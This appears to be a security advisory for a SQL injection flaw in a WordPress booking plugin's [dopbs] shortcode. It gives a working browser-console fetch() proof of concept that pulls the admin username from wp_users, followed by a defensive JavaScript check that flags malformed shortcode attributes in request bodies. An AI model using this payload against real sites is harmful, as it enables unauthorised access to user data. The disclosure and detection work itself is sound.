The plugin does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated user, such as a subscriber, to perform SQL injection attacks.
Note: A Calendar is needed (if there is not one already).
Run the command below in the developer console of the web browser while logged in to the blog as a subscriber:
fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
    }),
    body: 'action=parse-media-shortcode&shortcode=[dopbs id=\'1\' lang=\'en UNION SELECT 100000, CONCAT("DAY_MONDAY"), "", "", user_login COLLATE utf8mb4_unicode_520_ci,"frontend" FROM wp_users WHERE wp_users.ID = 1 --\']'
})
    .then(response => response.text())
    .then(result => console.log(result))
    .catch(error => console.log('error', error));
The login of the first user (i.e. the admin) will be displayed in the calendar data JSON, within the text[names] attribute.
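A defender-side check for the request shown above, as an added example that is not part of the original advisory or the plugin's code: it parses an admin-ajax.php POST body and reports any [dopbs] attribute whose value is not a plain id or language code. The function names and the two accepted formats are assumptions made for this example.

```javascript
// Added example, not the plugin's code. The accepted formats below are
// assumptions about what legitimate [dopbs] attribute values look like.
const ID_FORMAT = /^\d+$/;                             // assumed: numeric calendar id
const LANG_FORMAT = /^[a-z]{2}(?:[_-][A-Za-z]{2})?$/;  // assumed: "en", "pt_BR"

// Constructed sample bodies: a normal shortcode, and the body from the PoC above.
const BENIGN_BODY = "action=parse-media-shortcode&shortcode=[dopbs id='1' lang='en']";
const POC_BODY = `action=parse-media-shortcode&shortcode=[dopbs id='1' lang='en UNION SELECT 100000, CONCAT("DAY_MONDAY"), "", "", user_login COLLATE utf8mb4_unicode_520_ci,"frontend" FROM wp_users WHERE wp_users.ID = 1 --']`;

// Parse name='v', name="v" and name=v pairs. An unterminated quote falls
// through to the bare-token branch, so it fails the format check instead of
// being skipped.
function parseAttributes(text) {
  const attrs = {};
  const pair = /([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|(\S+))/g;
  for (const m of text.matchAll(pair)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Return one finding per [dopbs] attribute whose value fails its format.
function inspectAjaxBody(body) {
  const params = new URLSearchParams(body);
  if (params.get('action') !== 'parse-media-shortcode') return [];
  const shortcode = params.get('shortcode') ?? '';
  const findings = [];
  for (const m of shortcode.matchAll(/\[dopbs\b([^\]]*)\]/gi)) {
    const attrs = parseAttributes(m[1]);
    for (const [name, format] of [['id', ID_FORMAT], ['lang', LANG_FORMAT]]) {
      if (name in attrs && !format.test(attrs[name])) {
        findings.push({ attribute: name, value: attrs[name] });
      }
    }
  }
  return findings;
}

console.log(inspectAjaxBody(BENIGN_BODY));
console.log(inspectAjaxBody(POC_BODY));
```

A check like this suits request filtering or review of captured POST bodies. The fix the advisory describes is still validating and escaping the attribute inside the plugin before it reaches the SQL statement.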